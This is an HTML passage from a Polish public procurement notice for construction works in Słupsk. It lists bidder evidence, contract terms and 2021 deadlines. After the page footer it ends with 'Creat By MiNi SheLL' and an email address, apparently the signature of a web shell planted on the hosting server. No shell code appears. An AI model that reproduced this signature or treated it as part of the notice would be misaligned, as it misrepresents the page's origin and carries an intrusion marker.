z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia<br/>na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokument potwierdzający, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 250.000,00 zł brutto (słownie:<br/>dwieście pięćdziesiąt tysięcy złotych 00/100); b) wykaz robót budowlanych potwierdzających spełnianie<br/>warunku udziału w postępowaniu, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty<br/>te zostały wykonane – załącznik nr 5 do SWZ; c) dowody określające czy roboty budowlane<br/>(wymienione w wykazie) zostały wykonane należycie, w szczególności informacje o tym czy roboty<br/>zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; d)<br/>wykaz osób, potwierdzający spełnianie warunku udziału w postępowaniu, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami –<br/>załącznik nr 5a do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferty składane wspólnie:1) Wykonawcy mogą wspólnie ubiegać się o udzielenie<br/>zamówienia.2) Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy.3) Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo.4) Wszelką korespondencję w postępowaniu Zamawiający kierować będzie do<br/>wskazanego pełnomocnika.5) Oferta wspólna, składana przez dwóch lub więcej Wykonawców,<br/>powinna spełniać następujące wymagania:a) oferta wspólna powinna być sporządzona zgodnie<br/>z SWZ;b) sposób składania dokumentów w ofercie wspólnej:- dokumenty składane przez<br/>członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być podpisane<br/>przez wyznaczonego pełnomocnika lub osobę upoważnioną doreprezentowania danego<br/>podmiotu.6) Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony mają prawo do przedłużenia Terminu zakończenia robót o okres trwania przyczyn, z<br/>powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót, w następujących<br/>sytuacjach: 1) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu<br/>zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi<br/>Zamawiający, w szczególności będą następstwem nieterminowego przekazania Terenu budowy,<br/>konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub<br/>będą mogły mieć wpływ na dotrzymanie Terminu zakończenia robót, 2) gdy wystąpią<br/>niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót,w<br/>szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi<br/>przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność<br/>wykonania pracw tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność, 3) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót<br/>niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz<br/>udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu<br/>Umowy, wystąpienia niebezpieczeństwa kolizjiz planowanymi lub równolegle prowadzonymi<br/>przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych<br/>kolizji, 4) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez<br/>właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność, 5) gdy wystąpią opóźnienia w wydawaniu decyzji,<br/>zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy<br/>przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidzianyw przepisach prawa, w<br/>którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność, 6) jeżeli wystąpi brak możliwości wykonywania robót z<br/>powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich<br/>wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy, 7) wystąpienia<br/>Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej<br/>postanowieniami.Pozostały Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia<br/>zawiera załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/um_slupsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-29</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com